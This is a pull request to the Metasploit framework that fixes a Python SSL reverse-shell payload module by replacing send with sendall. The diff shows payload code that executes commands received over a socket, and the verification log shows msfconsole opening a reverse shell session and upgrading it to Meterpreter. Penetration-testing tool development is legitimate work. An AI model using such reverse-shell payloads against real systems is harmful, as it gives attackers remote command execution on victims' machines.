### PR TITLE
Fixed python reverse shell ssl send for EOF occurred in violation of …

### DIFF
--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -59,7 +59,7 @@ module MetasploitModule
     cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
     cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
-    cmd += "\ts.send(stdout_value)\n"
+    cmd += "\ts.sendall(stdout_value)\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
     cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 557
+  CachedSize = 561
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions


### PR DESCRIPTION
Fixes "ssl.SSLEOFError: EOF occurred in violation of protocol" when trying to upgrade a python/shell_reverse_tcp_ssl payload.

Updated "send" function to "sendall" - Unlike send(), this method continues to send data from string until either all data has been sent or an error occurs.
## Verification

Tested meterpreter upgrade of shell and normal shell commands.
- [x] Start `msfconsole`
- [x] `use exploit/multi/handler`
- [x] `set PAYLOAD=python/shell_reverse_tcp_ssl`
- [x] `exploit -j -z`
  Command shell session 192 opened (4.3.2.1:54321 -> 1.2.3.4:12345) at 2016-05-06 00:11:22 +0000
- [x] `sessions`
  192  shell python                                                4.3.2.1:54321 -> 1.2.3.4:12345
- [x] `sessions -i 192`
- [x] `ls /tmp`
  mysql.sock
  Background session 192? [y/N]  y
- [x] `sessions -u 192`
  [_] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [192]
  [*] Upgrading session ID: 192
  [_] Starting exploit/multi/handler
  [_] Started reverse TCP handler on 4.3.2.1:54321
  [_] Starting the payload handler...
  [_] Sending stage (38526 bytes) to 1.2.3.4
  [_] Meterpreter session 194 opened (4.3.2.1:54321 -> 1.2.3.4:12345) at 2016-05-06 00:11:22 +0000

@zeroSteiner
